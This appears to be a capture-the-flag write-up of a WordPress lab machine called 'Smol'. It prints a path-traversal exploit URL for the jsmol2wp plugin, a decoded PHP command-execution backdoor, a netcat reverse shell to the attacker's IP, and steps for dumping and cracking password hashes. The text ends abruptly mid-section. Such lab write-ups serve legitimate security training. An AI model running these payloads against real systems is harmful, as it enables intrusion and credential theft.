Initial Reconnaissance

The first step was scanning the target machine to identify running services. I used nmap to perform a service version scan:

nmap -sC -sV 10.201.2.67

Scan Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80/tcp open  http    Apache httpd 2.4.41 (Ubuntu)

So far, I discovered ssh and http (WordPress website) services running.

I added the target domain to my /etc/hosts for convenience:

echo "10.201.2.67 www.smol.thm" | sudo tee -a /etc/hosts

Next, I navigated to the website in my browser. Using the Wappalyzer extension, I confirmed that the website was built with WordPress.

Exploitation Phase

I ran WPScan to enumerate installed plugins, themes, and other useful information:

wpscan --url http://www.smol.thm/

Here are some interesting findings:

• XML-RPC Enabled — http://www.smol.thm/xmlrpc.php
• WordPress Version: 6.7.1 (Outdated)
• Directory Listing Enabled — Uploads: http://www.smol.thm/wp-content/uploads/
• Backdoored Plugin Detected: jsmol2wp (Version 1.07)

That jsmol2wp plugin looked particularly interesting, so I searched online for known vulnerabilities.

I found a public PoC (Proof of Concept) that allows us to read the wp-config.php file, which contains sensitive information like database credentials.

Exploiting the Vulnerable Plugin

Using the known PoC, I modified the URL to execute the exploit:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Upon visiting the URL, I successfully retrieved the content of the wp-config.php file, which revealed database username and password.

Accessing the WordPress Admin Panel

Armed with the database credentials I retrieved earlier, I headed to the WordPress admin login page:

http://www.smol.thm/wp-admin

I successfully logged in using the following credentials:

• Username: wpuser
• Password: kbLSF2Vop#lw3rjDZ629*Z%G

Once inside the dashboard,

I noticed one page and three posts available. I decided to investigate the page titled “Webmaster Tasks!!” which seemed interesting.

The page instructed me to check the code of the “Holly Dolly” plugin. A quick search on GitHub revealed that plugin source code typically includes a file called hello.php.

Based on prior knowledge of vulnerable plugin structures, I assumed the URL pattern looked like this:

/wp-content/plugins/jsmol2wp/php/jsmol.php

After several failed attempts, I managed to crack the correct URL to access the hidden page:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-content/plugins/hello.php

Upon visiting the URL, I discovered a base64-encoded string embedded in the page source.

Decoding the Encoded Value

I copied the encoded string and decoded it using:

echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 -d

The decoded content was:

if (isset($_GET["cmd"])) { system($_GET["cmd"]); }

This confirmed an arbitrary command execution vulnerability via the cmd parameter.

Exploiting LFI to Get a Reverse Shell

Next, I visited revshells.com, looked for a simple BusyBox reverse shell, and copied the following command:

busybox nc <attacker-ip> 4444 -e sh

I started a netcat listener on my AttackBox:

nc -lvnp 4444

Then I triggered the reverse shell by visiting:

http://www.smol.thm/wp-admin/edit.php?cmd=busybox nc 10.17.30.120 4444 -e sh

I immediately received a shell connection:

www-data@ip-10-201-2-67:/var/www/wordpress/wp-admin$

To stabilize the shell, I ran:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(ctrl + z)
stty raw -echo; fg

Now I had a fully interactive shell.

Exploring the System

At first glance, nothing interesting popped up. But then I remembered the database credentials from the wp-config.php. I tried logging into MySQL:

mysql -u wpuser -p

Entered the password:

kbLSF2Vop#lw3rjDZ629*Z%G

Successful login!

Next, I listed the databases:

show databases;

Output:

| wordpress |
| information_schema |
| mysql |
| performance_schema |
| sys |

I switched to the wordpress database:

use wordpress;
show tables;

Among the tables, the wp_users table stood out. I ran:

select * from wp_users;

This revealed several password hashes. I copied all of them into a file named wordpress_hashes.txt.

Cracking the Password Hashes

Using John the Ripper, I attempted to crack the hashes:

john --wordlist=/usr/share/wordlists/rockyou.txt wordpress_hashes.txt

After some time, I retrieved a valid password for user diego:

• Password: sandiegocalifornia

Capturing the User Flag

I switched to the diego user:

su diego

Entered the password:

sandiegocalifornia

Then I checked the home directory and found the user.txt file:

cat /home/diego/user.txt

output:

45edaec653ff9ee06236b7ce72b86963

Accessing Gege’s Account and Extracting the Zip Password

From think@ip-10-201-2-67, I switched to gege:

su gege

Inside /home/gege, the wordpress.old.zip file was present.
To extract the file, I started a Python HTTP server:

python3 -m http.server 9999

On my AttackBox, I downloaded the zip file:

wget http://10.201.2.67:9999/wordpress.old.zip

I used zip2john to prepare the file for cracking:

zip2john wordpress.old.zip > wp.txt

Then ran John the Ripper to crack the zip password:

john wp.txt -w=/usr/share/wordlists/rockyou.txt

Success! The cracked password was:

[email protected]